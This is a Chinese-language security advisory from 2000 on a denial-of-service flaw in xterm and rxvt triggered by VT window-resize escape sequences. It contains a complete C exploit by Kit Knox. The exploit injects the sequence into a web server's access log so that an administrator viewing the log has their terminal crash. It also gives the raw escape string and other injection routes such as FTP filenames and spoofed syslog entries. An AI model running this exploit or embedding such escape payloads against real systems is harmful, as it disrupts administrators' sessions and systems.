首页 -> 安全研究
安全研究
安全漏洞
xterm 特殊控制字符导致拒绝服务漏洞
发布日期:2000-06-02
更新日期:2000-06-02
受影响系统:
xterm (XFree86 3.3.3.1b(88b)不受影响系统:
rxvt v2.6.1
+ Linux
描述:
KDE konsole 0.9.11
Secure CRT 3.0.x
发送VT控制字符给xterm,可能导致xterm崩溃。在某些情况下,当rxvt在处理这些控制字符
时,可能导致耗尽所有的可用内存。导致拒绝服务攻击。
这些控制字符可能被防置在一些恶意站点的文件或者banner信息中,也可能是在某些log文
件中。当管理员在xterm/rxvt下用cat/tail等程序察看这些log文件的时候,就可能受到攻
击。
<* 来源: Kit Knox <kit@rootshell.com> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
*
* xterm Denial of Service Attack
* (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
*
* Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes
* rxvt v2.6.1 -- consumes all available memory and then
* crashes.
*
* Not vulnerable: KDE konsole 0.9.11
* Secure CRT 3.0.x
*
*
* By sending the VT control characters to resize a window it is possible
* to cause an xterm to crash and in some cases consume all available
* memory.
*
* This itself isn't much of a problem, except that remote users can inject
* these control characters into your xterm numerous ways including :
*
* o Directories and filenames on a rogue FTP servers.
* o Rogue banner messages on ftp, telnet, mud daemons.
* o Log files (spoofed syslog messages, web server logs, ftp server logs)
*
* This sample exploit injects these control characters into a web get
* request. If an admin were to cat this log file, or happened to be doing
* a "tail -f access_log" at the time of attack they would find their
* xterm crash.
*
* Embedding "ESCAPE[4;65535;65535t" (where escape is the escape character)
* inside files, directories, etc will have the same effect as this code.
*
*/
#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
int sock;
int
main (int argc, char *argv[])
{
struct hostent *he;
struct sockaddr_in sa;
char buf[1024];
char packet[1024];
int i;
fprintf(stderr, "[ http://www.rootshell.com/ ] - xterm DoS attack - 05/31/2000.\n\n");
if (argc != 2)
{
fprintf (stderr, "usage: %s <host/ip>\n", argv[0]);
return (-1);
}
sock = socket (AF_INET, SOCK_STREAM, 0);
sa.sin_family = AF_INET;
sa.sin_port = htons (80);
he = gethostbyname (argv[1]);
if (!he)
{
if ((sa.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
return (-1);
}
else
{
bcopy (he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
}
if (connect (sock, (struct sockaddr *) &sa, sizeof (sa)) < 0)
{
fprintf (stderr,
"Fatal Error: Can't connect to web server.\n");
return (-1);
}
sprintf(packet, "GET /\033[4;65535;65535t HTTP/1.0\n\n");
write (sock, packet, strlen(packet));
close (sock);
fprintf(stderr, "Done.\n");
}
建议:
暂无
浏览次数:7281
严重程度:0(网友投票)
绿盟科技给您安全的保障